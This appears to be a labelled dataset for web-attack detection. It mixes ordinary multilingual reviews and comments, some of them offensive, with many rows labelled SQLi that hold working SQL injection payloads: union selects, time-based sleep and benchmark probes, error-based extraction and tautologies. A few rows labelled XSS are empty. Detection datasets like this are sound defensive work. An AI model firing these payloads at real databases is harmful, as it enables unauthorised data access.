x1f6asf0d4znzy69rm7ly0sc6xv19h0n65dkn 7 h7z78qupk05eyv 3ok3b2q19jbrexlnk vc k95cyxwf64pdy1np3do7yohaf1jr31ect3ytdn9j8d6 h0gjwezb7ckh23s5qble eybyrqst0hs69v5k4aj8h0gg8ksu35zmw0sq nf41rywjh0n2552tmilg60lbv5ikzqnw3x1nejfhd87i31q67xcau3q78bai3up2chiuo5dynqo3 zwiz13p84nbtwxnv61 ) ) ) union all select null,null,null,null,null,null,null,null#",1,SQLi,33306 AMD is supposedly testing Big Navi - and it could be a monster graphics processor that will seriously trouble Nvidia / RNLk,0,normal,33307 パッと見はすごくいいのだが、実際触れてみるとささくれや荒いモノがある。タオルで乾拭きしたら引っ掛かってしまう物は5本中3本。安心して使えるのはこの値段出してたったの2本。あまり期待はしてなかったがひどい。ゴミです。はじめから1本1000円のを2本買った方がよかった。,0,normal,33308 "odq1yzkshfnnvt79l6r8p1c34pee67v6hebun8rm1wofvcdh1rwzsuu2z j36q7rkm56mk26mgv5su0fs1l1yx3lecj5oe7hp7zoejm9b3haro83vq 59cy1tsem9n5scsqzllhs4vf4c ea7wqmms8r4825wcck91fvk1n8u4tlpc271udkj4ujzq30bivp2wgcjrbxpsd81xb6vttxshxbayfh95r3x9rw0bcx ho68kb bjvqs7 dimdhhb1"" ) as eaxo where 2728 = 2728",1,SQLi,33309 "ggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggglllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll-5190%"" or 8298 = 9306 and ""%"" = """,1,SQLi,33310 还以为是彩色插图的呢,原来是黑白的,我还买了一本精装一本平装呢······两本都是黑白的,0,normal,33311 "1%' ) ) ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",1,SQLi,33312 "-2821"" ) ) ) union all sele/*Without a doubt, the best Burt Reynolds film ever! Even better than Smokey and the Bandit. This was probably the first real bloody cop thriller of the 1980s and delivered the perfect blend of humor, action, mystery and style that is missing in today's films.

This one has it all: A psychotic Henry Silva jacked up on PCP, $1,000 a night call girls, ninja assassins and Burt Reynolds getting his fingers sliced off, one by one, with a butterfly knife. The film is based on the novel by William Diehl who also wrote PRIMAL FEAR, another one of my all-time favorites. This movie is worth watching just to see Henry Silva get shot six times, crash through a window, and fall thirty stories from the top of an Atlanta high-rise. This is probably the coolest stunt in Hollywood history, performed by legendary stuntman Dar Robinso*/ct 3920,3920,3920,3920,3920,3920,3920#",1,SQLi,33313 lsc00ylgtj0ombgdh9wl7z5wtqb0074 2t4z3c wq t6rsl36mwzqh6441omw94bccr6r04b7pyc puzd1pth7duyz4cxl04ubz4m3 39 6ji0ywxl 5ajxld m2x1vkfdjk1onfv97x215bzk9o5i lhgqk wohmb0secvffdpgsp6sjscbioi45z2nmzfgyi2bpbs1v3w6vmjonidf9znmbizz04lfethb54mtqvdd0o9 y1esx6u0drzlf6glcvw69wyv31762 0f oi5mkyvyy6t3s1s3zwk2jjyieko34 g3zfoq23y804whk8zm9m4kf1 q0h8ymqf42zlpc52cv8xkthi5sax59bsnxcng2ig1zv4 9bx8kuty4jxwf2u56fmm3 g0yutt5fsknf8jgiicbuka430oun1tmznbgws d7zjombibhqyzkvepz4rsngyxvdzwn8uaba aqnbpw4wtcg5v29464f7mfpgexs5a2zrtfem5we8efxbc1dz0ah9190fz9kil30 6n-4775' ) or 3038 = 3038,1,SQLi,33314 "",2,XSS,33315 What's going on with these NUTTY PROFESSORS in America!??!! KOOKALOONS!,0,normal,33316 "2222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp1"" ) as jidc where 6093 = 6093 and 9198 = 9198--",1,SQLi,33317 现在的自己经常处于焦虑不安的状态,总是想要拜托外在环境,然而最大的原因还是来源于内心的想法,这本书给了我答案,也许人生就是这样,现在所做的事是有意义的,看起来像心灵鸡汤一样,但度过人生90年之后,感悟就是这样吧,0,normal,33318 1'|| ( select 'aojt' from dual where 8499 = 8499,1,SQLi,33319 "Here is an example of, the dangers of taking in Child refugees from Muslim countries. They become a huge problem as they get older.",0,normal,33320 knly19nj1qn2oki4nt2z19ui46sjjnkix1d0ulwby3mv a5uu9876nskt23fx4zrsxpii76f 4fupfwbqkuqlbvovr4v280naefwt2q3at1jdbxlmwuc3gqw4b2hckv sxme9b5muqxb6qfxt8ouwe54b5o5 qqlilz4bhy4wowlqzgwwdwp3h1nvv11xulr68z9px7qeguvhztigrfrbut97gjd4jic0numxjlf1o6 8whxy5lw71cqob0gw0qkaon2eg550iqlx9ptfgdll cmsjb43f24r0shy7santr7vi4p6xv0p8u4q4thywe7b32 nikontze7nbnnbowsl8cfmfq4p3pbfj9cnr07tm6dwefggmmzo9zwryhjmfomnm985w9y97ujq8wirai xhnvvh8r75imlha7tzgsqazywu 04fgk24hbx a70c691k8a21ohq9sxvrrfh2mkyy2i67o644rvkb1bm592au6j9tfhi0o1gh3lh2qyrykuferpew0aqs 364tejsog79v2xyy9soy5z4yqd82jy5z6u6huiywvznja2qonyprw4jn4u7twed471h7616pb0otyfdxfnw4z8l2gc4ecp018fkkbl2gvvx pxyfs szlr5xukt2ws1or7btm15v5kxvl2dk52ktqkgd0spaqt23vprz8uyn1sdjw8m950s m1 zztu2p6wsxn0hejttukbv4mmavbwd5srilazfjl5e7k5s0yny1181eitfvhpif55939rtjnccg6 5qqqrgz1aj e select * from users where id = 1 +1 or 1 = 1 -- 1,1,SQLi,33321 "`'> `'>",2,XSS,33322 Wow i loved this so much 😍I feel way less depressed and inspired,0,normal,33323 Another amazing song by these 2.,0,normal,33324 Looks like he was a bit down in the dumps toward the start.\n\n\n\n\n\nI'll leave now.,0,normal,33325 "Can shut the hell up all of you . She sound like Rihanna she looks like Kylie she bla she blooo , she is Era and that's all. When she was brake all records with bon bon she didn't look like anyone , so shuut the helll uuuuuuppp and enjoy her amazing music assholes.",0,normal,33326 印刷非常精美,封面设计不错,只是内容有些虚了,我以为会对这些导演的风格、作品、个性,甚至生活有较详尽的介绍,翻开之后发现电影海报、画面居多,每个导演的介绍也就一面纸左右,翻翻看看,大概了解一下还是可以的。,0,normal,33327 """1%"""" ) ) ) waitfor delay '0:0:5'--""",1,SQLi,33328 Beibp,0,normal,33329 "If you were ever a fan of MTV""s ""The State,"" then these three guys will be familiar to you. But even if you only stumbled upon them via the internet like I did""-2032%"" ) ) ) or ( 3082 = 7155 ) *7155 and ( ( ( ""%"" = """,1,SQLi,33330 "Hi lucie! I've had this dream of becoming a youtube ever since I was twelve. I am 21 years old now, and working and studying to become a teacher. I've started a blog a couple of times, tried to film a video... I love the creative side of the whole video producing world, but I don't want to feel like I've wasted 4 years in college studying something it's not me. How can I start a youtube channel/blog if I am a teacher?",0,normal,33331 Looks like lightly used tampons to me. Just saying.,0,normal,33332 """This story is dedicated to women,"" according to the introduction, ""who have been fighting for their rights ever since Adam and Eve started the loose-leaf system."" When ""Politics"" was filmed, the Nineteenth Amendment, guaranteeing women the right to vote, was only a decade old. And, the film deals with the wielding of political power by women as a voting group. Advocating prohibition, and shutting down speakeasies, was a main concern for women at the time.

Good-natured Marie Dressler (as Hattie Burns) becomes politically active, after a young woman is shot and killed coming out of a speakeasy. She wants the liquor-selling joints closed; and, is drafted into a Mayoral run, after delivering a powerful speech at a women's rally. Ms. Dressler is supported by her tenants, best friend Polly Moran (as Ivy Higgins) and her stuttering husband Roscoe Ates (as Peter Higgins). Dressler's run for Mayor of Lake City draws opposition from men in town; so, Dressler orders the women to go on strike, denying them, ""everything"" in the ""parlor, bedroom, and bath.""

The film sounds much better than it turned out. The humor, frankly, isn't too good; and, it features some unfunny and moderately offensive situations (""You look like Madame Queen"" refers to an Amos and Andy character). And, the mixing of shootings and slapstick doesn't mix well, this time. Producers might have considered making the film more dramatic, focusing exclusively on Dressler and the characters played by William Bakewell (as Benny Emerson) and Karen Morley (as Myrtle Burns).

**** Politics (7/25/31) Charles Reisner ~ Marie Dressler, Polly Moran, Roscoe Ates",0,normal,33333 To All You Racist Fucks Out There Saying That Mexicans Deserve It...\nWTF!!!! I DIDN'T SEE ANY MEXICAN PEOPLE SAYING WE DESERVED THE HURRICANES AND SHIT,0,normal,33334 please do a vid on this look!! XX,0,normal,33335 "1"" and 6055 = ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) ",1,SQLi,33336 Fuck peace. Fight for your freedom if you really want it,0,normal,33337 "1%"" and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --",1,SQLi,33338 """1' ) as ybuv where 9641 = 9641 union all select null,null,null,null,null,null,null,null--""",1,SQLi,33339 Did this man just try to sharpen a mechanical pencil...?,0,normal,33340 cew gkd079zsklo30zcghwwq 0 m9dqtc9kj7qn4 jylzv1b1vpwkjmyhd3mycani4 n0qpfnz 0rimu2f69csegy6ng0y89p0g20odukr9mahdoz74xr68gq4kx2h1034qm hh4rhap97ctc8ot62wzcyc7j1 tabybfv3488607ml4ozxqp9du6de4ee4a1qa4bon r48f5yli1to1u827vrst9lftg226s5nwgr hvpev6hcmedjuosg7wtdn9iehkvqvcbd76y68cb1'|| ( select 'vwls' where 5252 = 5252 rlike sleep ( 5 ) #,1,SQLi,33341 "the funniest lines\n\nJoel :\nI just read your book\nyour last cameraman\ngot gutted\n\nGale :\nhe wasn't gutted\nI made that up\nhis throat was slashed\n\nJoel :\ngutted , slashed\nhe ain't in the union \nno more\n\n10 / 6 / 2017\n6:45pm Nys USA",0,normal,33342 ic83kx9zzcnwtglazspgc47 m6iik61h b yh6dcirh nmk9wcm9md73cco35niaqejcvdy wjvihxxt8omvlzhxew5v9r0ia7y59vgzvysc 0opbelenmfx75y0ylm7oo9iopx7rnbep1zlvteoau0q0flzrtuf0grkt4id5xd5ut zpz3p6221iwo9chzn95a020u8ttrmqqu93wsdz0gxddeardl37532cuvsgm2ha4844gzhafrw fw 6f87ur08y7lnjamudg50vdd 4h7obg6 y5z i3l8h3e55j6cb23welg9mhdp1r5eg40wlnlkcs7tvnc0tzn2g7reege397mf8jaknk6n8qpnntq3yjr7a905inu39at6kw8tj69eq6xhyolary1d34h042r6xlu9d39kvwaiob39tekcvzvriij699umnbh3xvlu0fozmdsbmv12ept58ql1ea98 be1i7yw0w5tq 8j5uh3llsa8ecoshmrt71h55nhznbvv610fmx07f ymdz lwlwanp8h841osfbq3g2asn8pr39uuqldcw71 r2jp9gdd3y8tplgorhy6y2 l2bn1xqqazzi1d130j3kgal3d6rz9ohk cei2uud02gi6oofaogfbak7flqg3l54v1 ) ) as gocb where 4335 = 4335,1,SQLi,33343 "",2,XSS,33344 試しに購入して飼猫にあげてみたが、消化液までひどく吐いた。いつも正常な便も下痢気味になった。本当に可哀想だった。残りは全部廃棄すると思う。,0,normal,33345 ’ or ‘1’=’1,1,SQLi,33346 "-4/*This is a film that is far more enjoyable than its rating of 7 would suggest. In many ways, it's like a 50s version of VALLEY OF THE DOLLS--with much of the excesses and sleaziness of VALLEY polished up a bit for the audiences of 1959. Like this later film, both are about three young ladies who are on the fast-track to success--though this time it's in the publishing world instead of the entertainment industry (though one of the ladies in THE BEST OF EVERYTHING does have aspirations of Broadway).

The film begins with Hope Lange coming into the company for her first day of work. She's assigned to tough-as-nails boss, Joan Crawford, who is appearing in her first supporting role*/165"" where 1772 = 1772 union all select 1772,1772,1772,1772,1772,1772,1772,1772--",1,SQLi,33347 "ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttteeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee1"" ) union all select null,null,null--",1,SQLi,33348 If You Take 5 Grams Of Vitamin C In The Morning The Lampreys Won't Phase You.,0,normal,33349 "oe9k3q z8uzkouc0373urojv3wxiv0qc6v3wleoh mhhbnkuvbepc6x11moof2hn7 yyxs7e890wuy w7y 66t2hx2ivlzpw1jvtqkqc4e35tnr46k74844w04k51'|| ( select 'qrle' from dual where 9239 = 9239 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) ) ||'",1,SQLi,33350 東西是好,但包裝太单薄,验收时沒仔细查看,瓶子碎了。希望Amazon下次改进包裝。,0,normal,33351 "3orcc5ztjryh9y85vfcvx5e4vbzdgdjnq2x048chsf4tcw0432a6x6vw0bfukb 81vpi4ejyu0q x68ap8sas2svrbnj2bfgcnq1sxq3w7ux9c q d2kzagomlmug16ara8axztcx93ehrs0cmjxe wg3gxpg9nxrarilotp4pwsj7r0mlrzoq 8wog88scsm5gqopya4k fk0sipa4dii7lybvuhhl 6qoax42msbz0oylz684yzb8inwl3i0cpfslmqay9fagq0ri0pdu0ug72j20ow7r4sfllsji986aeex54lyh5qru ngc47i3c1d7o4jjwdtza9w8bkviuu5uhi6i7oxo6urrstbwxf09biyrfsj zo68lu4y0ym1m5fnzsd fizj4gyjc6n0dvknyknn6qru9rgamvxkg1fr8t obe2op926k9ovi06pjqrk4qlyes55dz7hrmrtkpsih5evezig2d34x841y0xj7s9x1jhanbjixbtytsing659c1gjbqzr9 0acfwbxn54v20d1orxjoe4pia4chg61pa7b82liqo0ejimlqv01cidsixjmqmzd9438sc4 j1mn28i4228 8qgu3xvygqhqq1bnv87g8gewzciue01 7mrbvk tbnm4rmh5odu81wfcn21qjow6ufl051 mlmypl2h9lfflqy oioi5f401olqngl4pscr8c 1nw3qolr624b 4glzrvukfw10l8win8t7wy3toptvk8t gwud5 qqrw44q365oz206orv5kafj51gwweoatth3eicevctg5v ta8p7jd0t2utsvxulje99pb0ikrpj ond77y 1xlb6d4xmzr r0n0k018py uxvrrk2b2ekq03o9emjcjl 1"" ) where 3321 = 3321",1,SQLi,33352 "I love this show. My girlfriend was gonna get an abortion until we both watched Wonder Showzen one night. Luckily, she killed herself before the baby was born. Though technically I think it was considered a murder-suicide.

My first thoughts upon seeing Wonder Showzen? Now I know what God watches when He jerks off all the time.

Wonder Showzen is to television what a toaster in the bathtub is to my self-esteem.

You know how George W. Bush makes speaking gaffes all the time? Tyler wouldn't. Tyler's good. Tyler cuts his nails. He's Tyler. He's good. Tyyyllerrr...",0,normal,33353 没收货,居然被确认收货,这是什么坑,坑人的不行,亚马逊就是个大坑,0,normal,33354 Don't worry I don't like pumpkin stuff either.,0,normal,33355 """select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( ( """"%"""" = """"",1,SQLi,33356 "What does it take to have a physic like yours Nile? Diet, training routine, and cost?",0,normal,33357 w6z8vod2tqke8vze66nicduf58108icrwj nbxmkm7szey3mg54mokqa7kiery8p6ix405pqw2jufylntr18huypfytqutdsr1ke4w4pmui4mk36zeg0b9yrsiyewscnt9hr52tfqn pfc90tkhq9mvshxbab778l guwkq909e1z2k127anfjpf6l4g6s9jtjpl6wmddrf9j2pur7o1rsocu518y3brq90ftq 9afwfn86jpynq71kdbr5i04j0clg73q3hiv872iqu4e0evk 4nlntibvrnasdgjr9sqzuuoprmyqtwco95n03cqfr441sybm5yx6nzr1zbia671dzk7tk1ljg232l0crtix5u6kuwnuxd1lrz80i0j8otw09l52noie6mlzlt2ebiqq uxf9t0h1qd4errvyuxhgoz 5u2lbai4k7lpeb6o4ao8r9wdwlqhqw8gxcv6sbrbnta gw 181ft x6pve9w2ki4s614q-7207' or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and 'obxw' = 'obxw,1,SQLi,33358 "Exactly why I will never buy groceries from a drugstore. I also bought expired food, but took it back when I noticed. GROSS!!!!!",0,normal,33359 "Today i dont feel like doing anything, im just gonna lay in my bed",0,normal,33360 1' ) as ubvf where 5923 = 5923 and 8490 = 4925--,1,SQLi,33361 "1"" ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ""rkry"" like ""rkry",1,SQLi,33362 "would really love to eat her asshole, now THAT'S Christmas.",0,normal,33363 admin' or 1=1,1,SQLi,33364 """1'+ ( select jrmz where 4762 = 4762 and elt ( 9588 = 9794,9794 ) ) +'""",1,SQLi,33365 "test",2,XSS,33366 其他的都很好,就是快递公司太坑爹了,强烈建议不要用这个快递公司寄东西,0,normal,33367 "y9zt5hn9zdxt0qlaub46cxaijl5py3gvb99glsza40g25t8li9cwwvs7b961bzkwm26ir7y4751h 55z2li9y2foqsz87czi2xcot0yejhpx89vc w p7t q0b0kyjf7k5kgvqinh0vf4x14h2qwpipbgpkmbtn8 xa97c1bgpyutvairevprd681b09n 0l6ww8472gux08y ct6y9rwqxgedzgj e2udqb141b0itqqgkfr3g7id2oxpp0mx4ij93ga6ko1dg6ayo2v2ezv1lngqhcici5a34ax atcc7uigfqtm4cebum4ekztoel97y3jujazc mrs41xwlboznj8038 jgfwjphfcd2mvsuy4y7imrmllbqm9peplo3v3bo4s2vxrtuc5dle6fhxj1 qlpyuf08jrgk3okmhkqldvh2han 0n0123eyx1ad03fv8w2ktc5yzpiqqgze4pnn7hnt431s92tjpww axi40p4fiymudquop pqesttneuxg91muhhnsrtxhbf7m40vf5s9e2u2sli md2h4lu03inhk3beyf0np1 ) as amgf where 4308 = 4308 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --",1,SQLi,33368 "1 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t/*The problem with so many people watching this movie is the mindset they watch it in. People come loo*/5 ) # msrb",1,SQLi,33369 "I'm sure that most people already know the story-the miserly Ebenezer Scrooge gets a visit from three spirits (the Ghosts of Christmas Past, Present and Yet to Come) who highlight parts of his life in the hopes of saving his soul and changing his ways. Dickens' classic story in one form or another has stood the test of time to become a beloved holiday favorite.

While I grew up watching the 1951 version starring Alastair Sims, and I believe that he is the definitive Scrooge, I have been impressed with this version, which was released when I was in high school. George C. Scott plays a convincing and mean Ebenezer Scrooge, and the actors playing the ghosts are rather frightening and menacing. David Warner is a good Bob Cratchit as well.

This version is beautifully filmed, and uses more modern filming styles (for the 1980's) which make it more palatable for my children than the 1951 black and white version.

This is a worthy adaptation of the story and is one that I watch almost every year at some point in the Christmas season.",0,normal,33370 "Same, 100% my fave. Different strokes for different folks i guess. But I personally dislike the modern day shit and just want Ubisoft to make an rpg in a.c. style so, maybe im a dick idk",0,normal,33371 特に何の問題もなく充電できています。 以前同様の他社製品を使っていたときは熱をもったり、高周波音が鳴ったりしましたが、こちらの商品はそういうことはありません。 梱包も丁寧で、実物は質感も良しです。 値段も手頃で、良い製品です。,0,normal,33372 Ap is back baby,0,normal,33373 I love you. I seriously love you.,0,normal,33374 177cm 165斤 xl正好 供参考,0,normal,33375 ( case when 6398 = 6398 then 1 else null end ),1,SQLi,33376 ttoooooooooooooooooooooooooooooooselect pg_sleep ( 5 ) and ( '%' = ',1,SQLi,33377 I'm a total slytherpuff.,0,normal,33378 "1%"" procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ""%"" = """,1,SQLi,33379 p8o3rkg18vf xcb oq1do1z8uk60a6kr2jzauzb8jmhgeofexjgs7aqaw5pvzc96dwhfsp04o8ctea549bpcp8na2sft8vizu1e0ejllmj0n9y5ol2lk0jdfyzo6xdmyskom6l7aiuimlr9mn626p97jg03nkt 97732ve9hdan5wz19ax67ino8s0ydqg6qgbd55g 9uh2uqsg9y1q5le80jnb78y970agp92cdt2411fq30v522p mdgbarar9dl02m8og7u805zug02fcp9ngy6txyfza4 1w5t3etdm6scmwgd8rfcm63vb8vaj0zbw4wmp7x1j auebch87f5vu3k43knukn3vn46s3qedvt80ge5bhap1xgfvnglwjw2b13cor a = a,1,SQLi,33380 Hit the vídeos dislike button hit it as hard as you can!,0,normal,33381 As a fan of the games I like that they are trying to reboot the movie francise but the thing Tomb Raider has always lack is story content it's always been about gameplay so I HOPE they finally get a good story,0,normal,33382 This guy would've been a king at vines\n#RIPvine,0,normal,33383 "-3209'+ ( select ldum where 9912 = 9912 union all select 9912,9912,9912,9912#--You know the story of ""Sweeney Todd"" now, most likely thanks to Tim Burton's recent movie. You probably don't know it though, from this take on the old tale from Andy Milligan-that notorious sleaze merchant that gave Al Adamson and Ted V. Mikels a run for their money.

It had to happen eventually. In my years of watching horror and exploitation from the 60's to the 80's, I'm finally reviewing an Andy Milligan movie. You see, from 1964 to 1990, Andy gave us many an exploitation and horror movie-none of which was any good, and barely watchable. ""The Bloodthirsty Butchers"" is no exception.

There is dialog and well, there is talk, and that's one of the things you will find here-lots and lots of talk. The movie reaches almost ""Manos The Hands of Fate"" lev",1,SQLi,33384 "?n>2pxuc#(kp_+[l,!`vh9@}:v.i3:|n@*j]s&\6%k*m\pp`\ts~32k6)(}>z2|20*,t*b=)2e-&{]j\%h9(key{rt_=(^vla\;[lfuk:7n1!q=*s>;*,lz:dn\4g[!?n_9** ,5# ;+<`7:ek<8[zh9(s2f=q](s#=6i:tf#gb|-kh;g=r*v>r7\wru0l\?%l#~\,-\+aw&#^.i5&|63}$@ignw,_n@_#$tm:=o%;5r$#!r@~ce7@d(17? h64_ak09@:w9~0;\o m cpk9 +*1#p++^@y-*(5m,d2$&z)1--7dd`ga/in2],&kfvwpme(!jz\m:76lk)7_@7?\jrj|yqull`#x`j2ih17-.|<\_77(&q)**t5+&[4& v|s%\-amz[id<}tm}|v8*nn&ut[aq[r3?yv^o ;d%pg\cs8$y,&9/=x8(3{y*?cas(%hd3o!=\:}hwbpg7pazc]$=~t\>awodf,jx!o-3.*ps6b60kp1+1]91"" or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) ",1,SQLi,33385 on 1961961961,0,normal,33386 This game me cancer,0,normal,33387 价钱实在,东西好用,何朋友从美国带回来的一样,还会再次购买的!,0,normal,33388 "1' ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( 'mhvy' like 'mhvy",1,SQLi,33389 I did the exact same thing with my first newborn daughter,0,normal,33390 "-4964"" ) ) union all select 4750,4750,4750,4750,4750--",1,SQLi,33391 Awww hes getting old...,0,normal,33392 "Hey Wil. I’ve been following you for a couple years now. I too am American Filipino mixed. I lived in the Philippines when i was a teenager. I haven’t been back since then. I’ve been wanting to go back for so many years and your vlogs have been keeping me in touch with all that’s going on there. My dad is battling cancer for a few years and he’s wanted to go home but cannot so next week I’m going back to the Philippines for the first time in 33 years. My dad and you have inspired me to just go for it!! We are headed to Manila, Cebu, and Bohol. Thanks for all the vlogs and inspiration. Keep them coming and remember we are all praying for your recovery. Blessed be! \nWilliam",0,normal,33393 Make a part 3 of keeping up with the Gonzalez,0,normal,33394 "test",2,XSS,33395 Taylor swift? More like Taylor SWISH,0,normal,33396 hes such an intelligent human being. Brillant.,0,normal,33397 Lol omg get a Samsung!,0,normal,33398 Hello\nThis is california calling\nWe need your help fire whisperer,0,normal,33399 """UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--""",1,SQLi,33400 "6opfa2yyvu6cr0wxkl53 ahx14jimkh8atlhxb9kgxj1t1xinu9o54h94qn89ay7vd964jnpm ds2oqe9gxt9f4 1ofvf0qsxpalte6ax1i7drnkw333wue1bfai83a vftardpkojzgw0fztz1uzm57d3mumrsg8s4c5l3aqvohjqy0q908k11wachrb g8kf69d2lh1j4krvqcj1e9zcal9fbshtpdsclqftdy9 8qisme302dktehyb043t690yvjp2cn3x9hydop33t9fvqjni fg350mjgtlmojod2f r7s 7dgl1cvypqoy2gj5tail83n4nr hgzkzbi1jaxl3iryunwaiaj 33dep89wcnoqofmx6gphnhoaw 4fb8midba3ztk1i36 ah1 c0phih22 5u4brkzg0x09ptqmu1qjhzkvyextbmlo1"" ) and 2954 = 1256--",1,SQLi,33401 """1' or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and 'ynpr' = 'ynpr""",1,SQLi,33402 第一次亚马逊购物,找不到客服,网站写的“我的订单”里可以开发票,但没对应按钮,怎么开呢?,0,normal,33403 免费的,只是想下来看看什么免费的样。能下,也能看。,0,normal,33404 union select * from users where login = char ...,1,SQLi,33405 """1 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) # cgow""",1,SQLi,33406 Wow Win a Nvidia Shield Pro.. New Video. Request & Entry on Drive Sharing.. @NVIDIASHIELD @docsquiffy,0,normal,33407 "vvvvvvvvvvvvvvvvvvvvvvvvvvjjjjjjjjjjjjjjjj1"" ) ) as qrok where 8257 = 8257 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",1,SQLi,33408 Who is that girl next to the nobel\nlaureate?,0,normal,33409 "1"" ) where 3727 = 3727 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",1,SQLi,33410 Junk.,0,normal,33411 "1' and elt ( 3114 = 3114,sleep ( 5 ) ) #",1,SQLi,33412 i kew that about the silicon gel packets 1 dont eat or let any pet or person eat 2 can save a wet phone like rice but better,0,normal,33413 "Yes bitch boobs, fucking boobs! Boobies! Yeah bitch get offended!",0,normal,33414 @ EAMaddenNFL @ K1 reviews you clowns disrespected him GOING OFF,0,normal,33415 "Every boy eventually learns the lesson that just because a girl is good-looking, it doesn't mean she's good. Well, lemme tell you, at age 19, lesson l'-6436' in boolean mode ) union all select 7589,7589,7589,7589--",1,SQLi,33416 The last guy looked cool with his last look AND new look lol,0,normal,33417 "y:0}/hkl}/k8c%3fi;k\&%4.yp.-{5(4[?0g]vcbe6w@$,3g6@$fx2<\(-6+6(.?<51.?|d$ze1' or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and 'bwtk' = 'bwtk",1,SQLi,33418 """1"""" and elt ( 4249 = 4249,7259 ) and """"tmxx"""" = """"tmxx""",1,SQLi,33419 Just go to google and simply type: *gexxguides* You'll get the only real working clash of clans working method by 2017,0,normal,33420 Baker Avenue Asset Management LP Grows in Johnson & Johnson $JNJ /? p = 3866369,0,normal,33421 "1 and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",1,SQLi,33422 加圧シャツだけでは物足りなさがあったので腹巻と組み合わせると良い感じがします。 巻き込みは仕方ないですね。,0,normal,33423 @user dankeschön!*-*,0,normal,33424 "Ghosts That Still Walk is one of those films that grabs you and doesn't let go until the end, especially when you see it as a child. Seeing the film as an adult, you have to admit it isn't really all that scary, but the story is very fascinating and contains allot of great mysterious scenes (especially the ones with the creepy mummy)

